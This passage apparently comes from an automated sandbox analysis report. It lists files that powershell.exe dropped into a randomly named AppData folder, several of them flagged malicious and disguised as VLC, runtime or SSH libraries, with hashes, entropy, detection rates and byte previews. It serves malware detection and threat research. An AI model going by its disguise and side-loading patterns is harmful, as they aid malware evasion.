                                                                                                                                                          SHA-512:C08DE8C6E331D13DFE868AB340E41552FC49123A9F782A5A63B95795D5D979E68B5A6AB171153978679C0791DC3E3809C883471A05864041CE60B240CCDD4C21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@.......................................VLV......`...%.bZf........R...%j..6../N..'...%.]1B3...+..6..'..6...wFA.}l?...K..L.MN.t.....f.sD&f......x.I...K.mP..P..\G.3.b..X...6.e.>L................................................................PE..d....%.b.........." .....`..........P.........@;..........................................`.........................................`7..........P............`...#...`...-......T.......T.......................(...0...8............p...............................text...._.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata...#...`...$...*..............@..@_RDATA...............N..............@..@.rsrc................P..............@..@.reloc..T............X..............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prx

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):442680
                                                                                                                                                          Entropy (8bit):6.511186357677561
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:9S4bS5XFvti0A0YqsAtMZDeJmdzh8KL5g3AepeV2fbRahYzUM3:9SMCXFFe0YqsAtEeJKCqN2jRahYp
                                                                                                                                                          MD5:9E82E3B658393BED3F7E4F090DF1FBE7
                                                                                                                                                          SHA1:BFFF954B8EF192C01AF9FB5D9141A21279CB9C31
                                                                                                                                                          SHA-256:C2AD5BD189DF04B39BE18DEC5CD251CF79B066010706AD26D99DF7E49FD07762
                                                                                                                                                          SHA-512:DE6A1E62D4E33F807D9C04F355A762717EEDBCF540E747A97BA824871D4A1F144F4929141DF333711D42AF01E441DBBCECBB25A6A4F8EC073A024D94197B776B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........F.V.'...'...'...G...'...G..o'...G...'..=E...'..=E...'..=E...'..vy...'..vy...'...G...'...G...'...'..+'..FD...'..FD,..'...'D..'..FD...'..Rich.'..................PE..L...-.@\..........................................@.................................. ....@..........................................@..P^..............8?.......:.....p...........................`...@............................................text............................... ..`.rdata..............................@..@.data...XA..........................@....rsrc...P^...@...`..................@..@.reloc...:.......<...F..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\updater\manager\ks_tyres.ini

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10077
                                                                                                                                                          Entropy (8bit):4.973640153352507
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:oqCaCVsP1MQzeRO11bvR2hpg6iYRkX+DHj5jkZU3KAg/sVfKPPfYqlwvR:9bf1MQzeRA1TR2hpg6iY+X+SuaAg+zqW
                                                                                                                                                          MD5:47F6571C7884DA6C743551AC724186D4
                                                                                                                                                          SHA1:C338CE7D292C78F420876332DE93684102EC04AC
                                                                                                                                                          SHA-256:894D3C57598ECB22C769CC3EA8219859A95E22740E72394A474012EA2119B3D9
                                                                                                                                                          SHA-512:5CF57F3F2C53FCBEDF44CD2C896008C41607D7583045E37B819DA1B1D3CE26073802E73FAB74EA6DEF035F11A256D9F0D11A87991CEA14EF5BAF67BDA21D6E20
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:README=Insert your mod's data in mod_tyres.ini....[abarth500]..ST=Street..SM=Semislicks....[abarth500_s1]..ST=Street..SM=Semislicks....[alfa_romeo_giulietta_qv]..ST=Street....[alfa_romeo_giulietta_qv_le]..ST=Street....[bmw_1m]..ST=Street..SM=Semislicks....[bmw_1m_s3]..ST=Street..SM=Semislicks....[bmw_m3_e30]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_drift]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_dtm]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_gra]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_s1]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e92]..ST=Street..SM=Semislicks....[bmw_m3_e92_drift]..ST=Street..SM=Semislicks....[bmw_m3_e92_s1]..ST=Street..SM=Semislicks....[bmw_m3_gt2]..SS=Slick SuperSoft..S=Slick Soft..M=Slick Medium..H=Slick Hard..SH=Slick SuperHard....[bmw_z4]..ST=Street..SM=Semislicks....[bmw_z4_drift]..ST=Street..SM=Semislicks....[bmw_z4_gt3]..S=Slick Soft..M=Sli

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):109440
                                                                                                                                                          Entropy (8bit):6.642252418996898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                                                                                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                                                                                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                                                                                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                                                                                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{n...=...=...=l..<...=...=...=...=...=...<...=...<...=...<...=...<...=...=...=...<...=Rich...=........PE..d.....K..........." ...$.....`............................................................`A........................................`C..4....K...............p..|....\...O...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata..|....p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49560
                                                                                                                                                          Entropy (8bit):6.6649899041961875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:a0Q4HUcGJZekJSam1BbuBSYcCZbiLzlSHji9z4GwZHji9znwT:afnDex5izbiLzlE+z4Gwl+zwT
                                                                                                                                                          MD5:CF0A1C4776FFE23ADA5E570FC36E39FE
                                                                                                                                                          SHA1:2050FADECC11550AD9BDE0B542BCF87E19D37F1A
                                                                                                                                                          SHA-256:6FD366A691ED68430BCD0A3DE3D8D19A0CB2102952BFC140BBEF4354ED082C47
                                                                                                                                                          SHA-512:D95CD98D22CA048D0FC5BCA551C9DB13D6FA705F6AF120BBBB621CF2B30284BFDC7320D0A819BB26DAB1E0A46253CC311A370BED4EF72ECB60C69791ED720168
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........V...V...V......T.......T..._.D.]...V...e.......S.......Q.......M.......W.....(.W.......W...RichV...........PE..d...}.4..........." ...$.<...8.......A..............................................e4....`A........................................0m.......m..x....................r...O......D....c..p...........................pb..@............P..h............................text...@:.......<.................. ..`.rdata..."...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1081320
                                                                                                                                                          Entropy (8bit):6.564787951526749
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:k0Rdvjw14ZCWQuTs54Qbz27j7BS2Nv+4BT8+u60:BDZ2zAj7pXT3i
                                                                                                                                                          MD5:40B9628354EF4E6EF3C87934575545F4
                                                                                                                                                          SHA1:8FB5DA182DEA64C842953BF72FC573A74ADAA155
                                                                                                                                                          SHA-256:372B14FCE2EB35B264F6D4AEEF7987DA56D951D3A09EF866CF55ED72763CAA12
                                                                                                                                                          SHA-512:02B0EA82EFBFBE2E7308F86BFBEC7A5109F3FE91D42731812D2E46AEBEDCE50AABC565D2DA9D3FBCD0F46FEBBFF49C534419D1A91E0C14D5A80F06B74888C641
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......d.................l..........8.............@.....................................................................;........-...................4...K...........................................................................................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...d............p..............@....bss.....d...P......."...................idata...-..........."..............@....edata..;............P..............@..@.reloc...............R..............@..B.rsrc................6..............@..@.....................4..............@..@........................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\carferry.flv

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12108
                                                                                                                                                          Entropy (8bit):6.288980552421208
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hQybRAKeTbBNJQy9icUy0VbOAMOrK89Iy7vgE1zq78yEIgk6kh:hDbyKIBnQ+UdVTRZvgEJYqkRh
                                                                                                                                                          MD5:16A30926E4EBC495D3659854C3731F63
                                                                                                                                                          SHA1:2B46D1EE4F0B9C6B184AAD6D9A246745B3B4163C
                                                                                                                                                          SHA-256:DC260B93C358E10FC6F74C0B9F487DD0C2FD58E791EC5B0925B0546258923B36
                                                                                                                                                          SHA-512:04A4893E068A6BCBEC340398868B37ADCF8D41580B2E6EB7A5CD30396A14ACD401E67CFBB0E3ED05FA31601CB0261B82DF2A4D9A3713DB7E39C61C7FB64EA71F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..u.d.y.gvqc....Mcpu[..Z..G..H.m.J..i...D.Qp..FT..M....`OV..Uia.OE..b..wY...L.O.C..MhYv...QSBC.q......\...L.k[.nncg[FCjQDd.^...IrFT]F.o.R...G...[J.Cp.l.n.....^..s......A..Ce.UW......JBo.....kafR...c.p...XHa.P..c..qmHJ....PWq_Rw.K.[.SHC.n`..\Y^....U.Kyy_p.c.jj.X.W..Ch..Mhr.o...A...c.......lu.CWrmj.u.[..i.Za._c`a.Q.L.wqit`[.H.N.t...R..Uk...M.h\v.ZN...eq.....C....T....xA......u..qiKDpbnPto.taU..E.pb.t.H..lNEFOJ....FT_.Tdy...NUa.v.Etx..b....S....l.ni.j^mBQW...MRZ....f...rgL.p..F.[its........\....FO....c.HyEE..q..Q.g.G.....bUP..Xuv.G.w.F........Vp[.f..uf......LKXa._..Z.ZX...osp..qUG.B^\....r.F.FSdO]Psd.w.fVlQ..f_T.xid_.h.LQ.].BjdKuMfH..ZAZLt...K.QR.q..h.w.H..a..D....PPf..A..EFs.bnjJr...._..y..dI....VA]qE...tFk..Q.bqe`I.k......].....j..[D.a..C.D.....qN[...`U.BMe.....kJs.U.d.......U_y.....R....Kt..DI...wTdQX..m.D.QleMgR[Qd.n.`..yaIDABEap..q.bs..Ww.sT....._cl..Ii..X.K..k.w.A.tF...Fqn.h.pxL..[.sK.O.FVpi....o.b.....B.vkA\n_.T.....S......Djq..j.U.M...vH.f.J.bp..Jm.n.......G......L.u..H...Q.p..[\.

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\glioma.asp

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1511802
                                                                                                                                                          Entropy (8bit):7.85439524691317
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:qlHJgwSq7bfCao4XM7+jjA29WG6sCc5dk3U/sR6G38DoouqJlGzqBAR2M:qlHJi+bfu4sAjZWG6sCc/kR5MEZqFBAP
                                                                                                                                                          MD5:99083617F7139EE9AD5D6B719286AC3A
                                                                                                                                                          SHA1:78AF90E2BF04D41A9839526B00630D439FECAFE0
                                                                                                                                                          SHA-256:7CDDF32DE8B02B3ECF42C50DED8593770C5AB96D76247155F28D1D3CC87A541F
                                                                                                                                                          SHA-512:A54EF634F43190FCF83EB1967B55E3E90A310C48ED0C8350DE86A92BE623F5502AB335E7A70CDFA8F126B3570B164781CFB625679741E6224976726655BF35AB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:...Ol....kgH..o.JQios.Ir...YqV.....d.q...FeQolnt.j.C.[...wb..f..k.`.Fe.UN.DQr.qf.QoY.H.R[......g.........`...........`s...t._l..f.G.x]yIil.H..Q....DKL.P.Z.c.t..D`.Xof.EgQ.smn]gAw.f.pCgb..S.H.bv.gs...p.\..es...L.r..g.F.B....tn.ou.Zs]..Fy....Z.TO.....Mnr..eH...EV.....R.I.....f..v.u.e.[c..ck`OK`O...fK.TriG......cJ..._....YV.M.UiPRc..RLo.\..c.....r.uj.kB..\OW.....IH..Nb^..H..W.IU]..Q..ct...B.N.QD..[oM`..\..dI..........._o[ZpRi.ZR..M.xYqgENV.O.K...Y..ZmXBH..X...x...\px.....CC...W...U.Bv..Zg..]Cb..Xn\[M.I....o...`..Gb.M_x.yAEoH.v..Y.I....jX..]Y....k..VJpp..q...Fmg....Oh..q\\.y].RhL..Vx...M..q.q..rfq..w......_...If..Y..........B.HxH_.rxctZ..Dvfxg.qrSxN..Pu.iEATm.Xj....].`w.....x....._.QdI...u[..T.ECu..PfF.ncVuET...`v]f[.i.._xD.rI.`w..T.f].]XF..c.E_.xmpgc.J.t..u.x..sjA.RI....g...uAt.K.V..t..EfE.Q.Ym...l..s..DmEcb..w`.H.P.rrrC.\...`.....IW...].^...K.......Y.K.C.x...g.C.........m.u.uwi.if..lIq.qdf...t...UR^.F\.y...Y....BU.c.V....S..Z[S.g........j..a..F....x....Y..pW....v..f.m..HLg.E.W.ny....V...

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):176888
                                                                                                                                                          Entropy (8bit):6.464800332254017
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:mZ6EqHx7iXIb/WmRJKn9llPMBq4tNyupwPU0sG0:mZ6E+x7iYiiMn9llP8q4tNyuusc0
                                                                                                                                                          MD5:96214B94B796BFFC48D63289854AE5A2
                                                                                                                                                          SHA1:383BDE4B3A861D47794AA4F03479A48C10A644DD
                                                                                                                                                          SHA-256:528C416CFB4813EE5F1DA52743EF4ADB20043171230098B27E25D1DD90E3F288
                                                                                                                                                          SHA-512:5243DD7153793AE33C3A25F2A92579C4E31813545680DE9A0ABAB36E61D42655DB4796A6F47606B47D6DCE0D3F47754FD29FBFD18B973B029DF0C543915750F3
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I?.?.x.........!.........r....................Pj.....................................@... ......................P..n/..............H............x...:...........0..................................................(............................text...............................`.P`.data...P...........................@.0..rdata..|........0..................@.`@.buildid5....0......................@.0@.bss.........@........................`..edata..n/...P...0..................@.0@.idata...............@..............@.0..CRT....,............Z..............@.0..tls.... ............\..............@.0..rsrc...H............^..............@.0..reloc...............f..............@.0B/4...................v..............@.0B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2673912
                                                                                                                                                          Entropy (8bit):6.903320844778949
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:hDWA3C12sNU/wEz2tMEjv9DZWtxfc1lVG3QNVBAUZLYasUpGaXBuQQ9umM:t3O2wEz2tMEj1lWtOrVG3QNVBAUZLX/
                                                                                                                                                          MD5:E25413BB41C2F239FFDD3569F76E74B0
                                                                                                                                                          SHA1:073E2A86C5C24EDE4C4AD2D8614261121A8D2661
                                                                                                                                                          SHA-256:9126D9ABF91585456000FFFD9336478E91B9EA07ED2A25806A4E2E0437F96D29
                                                                                                                                                          SHA-512:37B8339555DCF825A2E27464EB1D101F8E4B56460D1B78161E99BA6761F1A967668F11BA888A712C878D468F419A455DBC5E8E55E7FB9D4FBC87CB78F500EA9F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.:..(........!..........(..8........... ....tj.........................P).....?M)...@... .......................'.xU... (.. ...p(.H.............(..:....(.....p'......................`(.....................`%(..............................text...............................`.P`.data........ ......................@.`..rdata... ...@..."...,..............@.`@.buildid5....p'......N'.............@.0@.bss.....7....'.......................`..edata..xU....'..V...P'.............@.0@.idata... ... (.."....'.............@.0..CRT....,....P(.......'.............@.0..tls.... ....`(.......'.............@.0..rsrc...H....p(.......'.............@.0..reloc.......(.......'.............@.0B/4...........@).......(.............@.0B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1277496
                                                                                                                                                          Entropy (8bit):6.693734264633346
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:4pPfSOTjS+katpqQTutqG3kGP7NS0LdbiAJ:4VnTu+kNQqqG3kIE0Ldb3J
                                                                                                                                                          MD5:9A7234078559093E06C9D32148ED95A3
                                                                                                                                                          SHA1:40361DAD15B9B5AE2757A21D1CE6A61C3C37E891
                                                                                                                                                          SHA-256:32F5D0A454C26E8AA6F4CAD58F3782337CC97CFE2305BBFE564437E5F0D51BBC
                                                                                                                                                          SHA-512:9A2C3761D799999A691CD605F11C4014F604AFA9A46B3B4C9999EEF177F0E703CA2ED52C22824CBA613559CE37BD134C566D54A4E51141828816B02A4F3DA05B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B"..C...C...C..!...'C..!...?C..!...C...L...C...C..fC..!...7C..!....C..!....C..!....C..Rich.C..........PE..L......D...........!................J..............B...................................................................../......<....p...............p..8.......,.......................................@...............\............................text...=........................... ..`.rdata..7...........................@..@.data........P.......P..............@....rsrc........p.......P..............@..@.reloc...............`..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1953336
                                                                                                                                                          Entropy (8bit):6.308277402923281
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:3nn521M2+LQvsrfqPmckkcltu9Wl0iY9Cu4biY7DvCQ4Rze4:3n521M12cPY9Cu4j7WQ4Rzz
                                                                                                                                                          MD5:5421D49C2B1EABCBF9FC3CD5B3A4A7D2
                                                                                                                                                          SHA1:0028EDCEB5BE4FD315B460B37F499667564A1367
                                                                                                                                                          SHA-256:F555D9A75AFF39EA48A8C51A833833F7892060A3421C57546640BD560E87E67B
                                                                                                                                                          SHA-512:92AD7321A80D3E718E0C625BDF6D4FB122BC661E6B955744D513F043FD7733E39E13AB7A994A4BB140EEC3C1B3D72DDDDD9DC12D98A83811BBF1AB2266946E20
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........i..i..i.....i.....i......i......i..i...i.....i.....i.....i.....i..Rich.i..................PE..d...k..D.........." .....n...N................B.............................@...........................................................G..|...<............p...S......8........8...................................................................................text....g.......h.................. ..`TEXT.................l.............. ..`.rdata...............r..............@..@.data....N... ......................@....pdata...S...p...T..................@..@.rsrc................h..............@..@.reloc...Q.......R...n..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6013680
                                                                                                                                                          Entropy (8bit):6.4465681348803185
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:XMZDDtZO0oV8BPKzv694e7rnSmRw6DKnByzYC3rkOmcdbzKgZI9cji115OVcrDom:cno0w8BPW694evnSmG6oY013S26vCL4M
                                                                                                                                                          MD5:C4C176F948AAEFDBAC2007BE7540F807
                                                                                                                                                          SHA1:FAB53FEA6BF9B66EDF37C05F96D0113E7B3FF151
                                                                                                                                                          SHA-256:B7CE745085DA1EA321BA210178F90C7FBDA7419A64452A887219B6FDC7EF762C
                                                                                                                                                          SHA-512:F0883C2F65189A9992AF98FC05947DF34A43740D4C22196A2D3922EDFE7E4FB2BCD75226A24B9482D2BE5961EEB63A015A329A3A524F25D7E8C6ACBA31AB80BF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r...r...r..-.m..r..-.o..r..-.n..r...,...r...,...r...,...r..|+...r.......r...r...s...,..gr...,...r...,c..r...r...r...,...r..Rich.r..........PE..L.....9f...........!......>...........6.......>...............................[.......[...@A........................`.U.@.....U.......W..............h[..Z....W..@...UM.p....................VM.....`VM.@.............>.|............................text.....>.......>................. ..`.rdata..`.....>.......>.............@..@.data........U..~....U.............@....tls..........W.......W.............@....rsrc.........W...... W.............@..@.reloc...@....W..B...&W.............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8034544
                                                                                                                                                          Entropy (8bit):6.075853444565613
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:EpBqTfDVWxBameIwNZP81iXc6WOptqQbFYdzyCs7Cqy1mZ1PVJLnbd1AYLik7J3g:QE7kBvoXZgx+JLbdXxiflHsvhq75b5
                                                                                                                                                          MD5:0A86F2E157F36783F412379B8B94A1A6
                                                                                                                                                          SHA1:F679118D538D8C0AAB0D8693F8B9B86BC9CCEF2E
                                                                                                                                                          SHA-256:27056202300C852631354871960619AD713BAF02F06D080AFB1CCABA3CE6BC69
                                                                                                                                                          SHA-512:EA8101C2C5DFE11859CFC3539A82B66692920AEC8FBE8D64EE5A32475247F71CA98482E8C20B297811FF3D235738E9C20ACE33142E4833162068CB1F67C523BF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............`K..`K..`KXx.K..`KXx.Kt.`KXx.K..`K.cJ..`K.eJ..`K.dJ..`K..eJ..`K~.cJ..`K{.eJ..`K..K..`K..aK..`K{.iJ..`K{.`J..`K~..K..`K...K..`K{.bJ..`KRich..`K................PE..d...F.9f.........." ......K.........@-A.......................................z......<{...`A..........................................u.@...@'u......0z......pw......>z..Z...@z.H....b_.p....................c_.(....c_...............L..............................text.....K.......K................. ..`.rdata..H=)...L..>)...K.............@..@.data....,...@u......(u.............@....pdata.......pw.......w.............@..@.tls......... z.......y.............@....rsrc........0z.......y.............@..@.reloc..H....@z.......y.............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocol

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):676928
                                                                                                                                                          Entropy (8bit):6.024055449466699
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:iMuijXEeWt742E+F94FQoS+LZjXEmItnl9:HukEeWtEQr4Fi+LxEmItl9
                                                                                                                                                          MD5:91ACF072FE60B3EF9867FAEC1A7A8CB0
                                                                                                                                                          SHA1:F5BEEE29187C4573ACBF5A9105B6B475B6565F61
                                                                                                                                                          SHA-256:1F49ADC807A564E7C1ECF32F58074A1230A6FE4764E8F54CE7FFA8C2E880DCCA
                                                                                                                                                          SHA-512:6E096399E0AFEB7C5F1A2A60204B887E946B3B6BC926FC5A78A97592A202954EC5E83ECECC3AB1F66A2343DB10C2974C15462837DF342B0C5F6AD4594BD21B37
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q............."...0..\..........Nz... ........@.. ...............................i....`..................................y..O.......l............,..@(...`.......y..8............................................ ............... ..H............text...TZ... ...\.................. ..`.rsrc...l............^..............@..@.reloc.......`.......*..............@..B................/z......H.......TN..h...............H....x........................................(-...*^.(-......c...%...}....*:.(-.....}....*:.(-.....}....*V!.dN......s.........*:.(-.....}....*..{....*v.(/.....%-.&r...ps0...z}....*....0..6........(....,.*r...p..(....r...p(1......(......(......(....*z.r#..pr5..p......(2.....(....*....0..c........(....,.*.%-.&rK..ps0...z..rQ..p..(....r...p(1......(......o3...o4...(......o3...o5...(......(....*..0..6........(....,.*re..p..(....r...p(1......(......(..

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWiz

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):442680
                                                                                                                                                          Entropy (8bit):6.511186357677561
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:9S4bS5XFvti0A0YqsAtMZDeJmdzh8KL5g3AepeV2fbRahYzUM3:9SMCXFFe0YqsAtEeJKCqN2jRahYp
                                                                                                                                                          MD5:9E82E3B658393BED3F7E4F090DF1FBE7
                                                                                                                                                          SHA1:BFFF954B8EF192C01AF9FB5D9141A21279CB9C31
                                                                                                                                                          SHA-256:C2AD5BD189DF04B39BE18DEC5CD251CF79B066010706AD26D99DF7E49FD07762
                                                                                                                                                          SHA-512:DE6A1E62D4E33F807D9C04F355A762717EEDBCF540E747A97BA824871D4A1F144F4929141DF333711D42AF01E441DBBCECBB25A6A4F8EC073A024D94197B776B
